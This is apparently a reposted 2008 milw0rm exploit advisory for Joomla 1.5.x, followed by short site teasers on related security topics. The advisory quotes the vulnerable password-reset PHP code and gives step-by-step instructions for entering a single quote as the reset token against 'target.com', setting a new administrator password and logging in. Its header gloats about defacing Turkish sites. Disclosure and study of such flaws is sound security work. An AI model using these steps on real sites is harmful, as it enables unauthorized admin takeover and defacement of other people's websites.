#####################################################################################
#### Joomla 1.5.x Remote Admin Password Change ####
#####################################################################################
# #
# Author: d3m0n ([email protected]) #
# Greets: GregStar, gorion, d3d!k #
# #
# Polish “hackers” used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
# #
#####################################################################################

File : /components/com_user/controller.php

#####################################################################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( ‘Invalid Token’ );

// Get the input
$token = JRequest::getVar(‘token’, null, ‘post’, ‘alnum’); < --- {1} // Get the model
$model = &$this->getModel(‘Reset’);

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf(‘PASSWORD_RESET_CONFIRMATION_FAILED’, $model->getError());
$this->setRedirect(‘index.php?option=com_user&view=reset&layout=confirm’, $message);
return false;
}

$this->setRedirect(‘index.php?option=com_user&view=reset&layout=complete’);
}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130

function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery(‘SELECT id FROM #__users WHERE block = 0 AND activation = ‘.$db->Quote($token)); < ---- {3} // Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_(‘INVALID_TOKEN’));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.’token’, $token);
$mainframe->setUserState($this->_namespace.’id’, $id);

return true;
}
#####################################################################################

{1} – Replace ‘ with empty char
{3} – If you enter ‘ in token field then query will be looks like : “SELECT id FROM jos_users WHERE block = 0 AND activation = ” “

Example :

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field “token” char ‘ and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

Explore More

Basic Remote File Inclusion

Basic Remote File Inclusion DefinitionRemote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app’s.

Read More

How to Detect a Hacker Attack

If a hacker breaks into your computer, just noses around, and makes no changes to your computer, it’s not easy to tell he’s been there. There’s no alert that says,

Read More

Critical SQL Injection in mail4U is a production of Bagan Cybertech

PlanetCreator has reported another critical SQL Injection (vulnerability) on mail4U is a production of Bagan Cybertech http://www.mail4u.com.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring

Read More